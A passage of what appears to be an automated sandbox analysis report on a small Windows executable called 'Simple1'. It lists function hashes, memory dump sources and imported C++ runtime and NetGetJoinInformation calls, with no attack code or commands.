              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
              • String ID:
              • API String ID: 1133592946-0
              • Opcode ID: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
              • Instruction ID: b972cdfd03f97d3ac40a917731d2e1b79e3ef28c0df4678f98d91531cd9da4fb
              • Opcode Fuzzy Hash: c72b868e27cb6210fe93b8e03fa8e66d7301bfa151cb37a32990f55088ab15a1
              • Instruction Fuzzy Hash: AD316D21A186029EFB10FF659C55BBDE291AF417A4FC44435EA0D2B6D3DE2CE8048734
              APIs
              • memset.VCRUNTIME140 ref: 00007FF7CEA93FAC
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA9684A
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF7CEA96866
                • Part of subcall function 00007FF7CEA96810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CEA96898
              • NetGetJoinInformation.NETAPI32 ref: 00007FF7CEA93FC8
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CEA94071
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA94143
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CEA9414D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationJoinV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
              • String ID: Domain:
              • API String ID: 3601429228-3214134553
              • Opcode ID: e05d32c3414dced4783beb1fb8541798634a2826929863166fb91cf91aa68ad0
              • Instruction ID: 1e7ecfbb9013f891403c5314f82a81a04521ec630f0003e6d6a814009f937c4c
              • Opcode Fuzzy Hash: e05d32c3414dced4783beb1fb8541798634a2826929863166fb91cf91aa68ad0
              • Instruction Fuzzy Hash: E451C572A18B8589EB10EF65D8806BDB3B1FB88BA4F844132EA4D23B59DF3CD541C750
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
              • String ID:
              • API String ID: 762505753-0
              • Opcode ID: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
              • Instruction ID: 14f76f5f0ae923cf8a9c3a4a09852ac2677a91e232469f8d3e28b3ba6d453479
              • Opcode Fuzzy Hash: d6b85af30ed1ec3ab35491ff2678aa002b6a93c38241c4489de49d361cb69296
              • Instruction Fuzzy Hash: AF316122608B4189EB14BF15E84467EB3A0FB98BA4F884632DA9E17769DF3CE450C714
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
              • String ID:
              • API String ID: 3292048638-0
              • Opcode ID: 5a8dc9a0dc8590c58db9ef850d11c0215e570e1dc75ccd2455c4e5ab0f5e0e6a
              • Instruction ID: 8d66d92039b9115d371344f34d4df8661e82db28cf2e56e777bb4b5a695608bb
              • Opcode Fuzzy Hash: 5a8dc9a0dc8590c58db9ef850d11c0215e570e1dc75ccd2455c4e5ab0f5e0e6a
              • Instruction Fuzzy Hash: CC414032919B4299E700EF11EC40A3DB3A5FF48BA0F958135D94E23761DF3CA055C7A4
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID:
              • API String ID: 118556049-3916222277
              • Opcode ID: e525968f3bcce64392877eb82988f276976157d7ad8acd84272c50dfdb48e0f4
              • Instruction ID: fe53c17d6ae1138187c642d2fc985ffcdb47d507b5f47290d402ba3b355639d7
              • Opcode Fuzzy Hash: e525968f3bcce64392877eb82988f276976157d7ad8acd84272c50dfdb48e0f4
              • Instruction Fuzzy Hash: B9515F72608B459ADB159F2AE85467C73A0FB44BA4F944532EF5E57BA4CF38E061C320
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
              • Instruction ID: ca0bc90b4acd3c3769743059dae0a5e5a9aff2cd4c52547ec9af39bac3024d4f
              • Opcode Fuzzy Hash: df8cf8428a73b2714442bbd637f092005021725c8ab47a6cba6d15f8a732e014
              • Instruction Fuzzy Hash: A7316332705A428AEA659F26E9047BDA390FF84BE4F884435DF4D57761DE3CE4968310
              APIs
              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7CEA9107B), ref: 00007FF7CEA9B522
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA9B538
                • Part of subcall function 00007FF7CEA9BCA4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CEA9BCAD
                • Part of subcall function 00007FF7CEA9BCA4: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF7CEA9B53D,?,?,?,00007FF7CEA9107B), ref: 00007FF7CEA9BCBE
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CEA9B53E
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
              • String ID:
              • API String ID: 594857686-0
              • Opcode ID: 238c82254a5a0dd3bfdcea07084a0eea4643be32c8ba11d6a235a5ec125aee32
              • Instruction ID: 35fa8d89cb2ca743e4621a4bec37fff82a19f5d0edd72b3f89286885f8f590fb
              • Opcode Fuzzy Hash: 238c82254a5a0dd3bfdcea07084a0eea4643be32c8ba11d6a235a5ec125aee32
              • Instruction Fuzzy Hash: 2BE0EC41E295076EFF6879B12C5687DC1800F193B0EDC1B30D97F2B2C2AD1CE4558538
              APIs
              • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF7CEA99BE5
              • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF7CEA99BF1
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CEA99BFA
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@V12@$?flush@?$basic_ostream@_?put@?$basic_ostream@?widen@?$basic_ios@U?$char_traits@_W@std@@@std@@
              • String ID:
              • API String ID: 2670548386-0
              • Opcode ID: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
              • Instruction ID: 61a497f206caaf516ebf3fde9d336d3954b7c3287ce616edc08fcfbb754ebb8f
              • Opcode Fuzzy Hash: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
              • Instruction Fuzzy Hash: 75D01221A44646C5DA086F16BC544385350AF59F51B5C9431DD0F07321CD3CD0558210
              APIs
              • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7CEA99E05
              • ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF7CEA99E11
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CEA99E1A
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
              • String ID:
              • API String ID: 2094784882-0
              • Opcode ID: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
              • Instruction ID: be257de0554f5a373c66502e92c6cd4c4bd1e962c46f1644ed65277d097137d4
              • Opcode Fuzzy Hash: 7bf1451799b23f1ce879a372c8a86a1a3bb4693dc89d3fb925bfda278d19c75c
              • Instruction Fuzzy Hash: 20D01724B84A4686EA08AF26BC945389360AFA9F66B98A031CD0F47321CE3CD0958220
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: _fseeki64fgetpos
              • String ID:
              • API String ID: 3401907645-0
              • Opcode ID: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
              • Instruction ID: 4811ba9bf0910b37fd770c2feae2312047e5f8b2fbf82fa2b56ac6332ec52e1c
              • Opcode Fuzzy Hash: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
              • Instruction Fuzzy Hash: 1A313E72614B4189EB609F1AD95077CA7A0FB88BE8F848131DE5D977A4DF38D496C310
              APIs
              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7CEA91A88), ref: 00007FF7CEA975C6
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7CEA91A88), ref: 00007FF7CEA975D7
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
              • String ID:
              • API String ID: 356833432-0
              • Opcode ID: baf789e10b114cee5e0dc2a749248d1481134e019c89cdd30f75a30e5dac250a
              • Instruction ID: 028889853e3c5229e90cffcc6132fc9267de1c9a257143e476c9c1683601a365
              • Opcode Fuzzy Hash: baf789e10b114cee5e0dc2a749248d1481134e019c89cdd30f75a30e5dac250a
              • Instruction Fuzzy Hash: F421E432A09B4188EB459F39E85477C37A4F748F58F848036DA4D97368DF38C499C760
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: memcpy
              • String ID:
              • API String ID: 3510742995-0
              • Opcode ID: ff8da17e9ad61dbf7719b97cca7bcf2c3e620e3851f2e18b518f5e34869978b3
              • Instruction ID: 4d7f92a37c2673226a2c6340507fa1e164b97d553b69f70993a89bd0fccc07d7
              • Opcode Fuzzy Hash: ff8da17e9ad61dbf7719b97cca7bcf2c3e620e3851f2e18b518f5e34869978b3
              • Instruction Fuzzy Hash: 4C019E72B18B5482DA04AF1AF60046EA375FB88FC8B948532DF5C17B59DF3CD5A28340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
              • String ID:
              • API String ID: 313767242-0
              • Opcode ID: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
              • Instruction ID: 5e1aa3d6346a2a0457e6d4c25aa2fcd3e50628cbbc44ec3f466cfbd12814e9d4
              • Opcode Fuzzy Hash: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
              • Instruction Fuzzy Hash: 71315072608B819AEB60DF60E8407FDB3A0FB84754F84443ADA4E57B95EF38D548C724
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
              • String ID:
              • API String ID: 2933794660-0
              • Opcode ID: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
              • Instruction ID: 0f73282297d317764efa530661643c812bafcae075af818f552055ddee7e395e
              • Opcode Fuzzy Hash: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
              • Instruction Fuzzy Hash: 1E114822B14F018EEB00AF60E8556BC73A4FB58768F841E31DA2D977A4DF38D1548390
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
              • Instruction ID: 1e6e71c7875435ec4a39f84c0500fe41c7bcb43654a0babdecd7b50cec954902
              • Opcode Fuzzy Hash: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
              • Instruction Fuzzy Hash: 73A0022194CC06E8EA44AF00FD50939A370FB50760BD18435E10E630B59F3CA420C328
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$memcpy$?out@?$codecvt@Mbstatet@@Mbstatet@@@std@@
              • String ID:
              • API String ID: 4130688501-0
              • Opcode ID: 01f669d44c414489c0d11f8e075951c8e79cb506ac8647b793a89054146f820e
              • Instruction ID: d1e4c7a7cee1fb9e307430874d9e57f45d1d35c4e09802ad9b2ae03b19177268
              • Opcode Fuzzy Hash: 01f669d44c414489c0d11f8e075951c8e79cb506ac8647b793a89054146f820e
              • Instruction Fuzzy Hash: 9ED1C122F19B419DFB14EF64E840BBCA3A1AB497A4F814231DE6D27B95DF3CD4858314
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA9B2B5
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CEA9B2D5
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CEA9B2E5
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA9B32C
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7CEA9B359
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7CEA9B37A
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CEA9B3C0
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CEA9B3C7
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CEA9B3D4
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 1135186806-0
              • Opcode ID: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
              • Instruction ID: 2c1760c6fdc635a2be6e6c1d8380890a602ed446d43359a5259d15808b48dc2b
              • Opcode Fuzzy Hash: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
              • Instruction Fuzzy Hash: AD514132618A4189EB20EF1AD990A3DE7A0FF85FA5B55C532CE4E57BA1CE3DD4428314
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$?in@?$codecvt@Mbstatet@@Mbstatet@@@std@@memcpy
              • String ID:
              • API String ID: 281699261-0
              • Opcode ID: 9d65bfed7838d7cd01c189297b92ca64ffbdaea2cba263f34434c41371c6b8aa
              • Instruction ID: 24c68eefc2d9c7063f98730e60daecec9564f72e5b37f12325c451b6c9709c0c
              • Opcode Fuzzy Hash: 9d65bfed7838d7cd01c189297b92ca64ffbdaea2cba263f34434c41371c6b8aa
              • Instruction Fuzzy Hash: E0B18162F18A45A9FB00EF64D8446BDB361AB487A8F805631DA5D23BD8EF38D144C358
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107875074.00007FF7CEA9E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107890069.00007FF7CEAA5000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2107903470.00007FF7CEAA6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff7cea90000_Simple1.jbxd
              Similarity
              • API ID: fgetc
              • String ID:
              • API String ID: 2807381905-0
              • Opcode ID: 64994607539f38f552e42247ef51bee8c107110e09ecd35cad0c016812c1fa46
              • Instruction ID: 94fa9d0ca1d84d1998a1d516d77ed224578b09723fe9ee59c3cb62e1dccad4b7
              • Opcode Fuzzy Hash: 64994607539f38f552e42247ef51bee8c107110e09ecd35cad0c016812c1fa46
              • Instruction Fuzzy Hash: A4818822B14B4199EB109F65D8807BC77B0FB48B68F945632EA5D63BA4DF38D494C320
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2107858007.00007FF7CEA91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CEA90000, based on PE: true
              • Associated: 00000000.00000002.2107839193.00007FF7CEA90000.00000002.00000001.01000000.00000003.sdmpDownload File
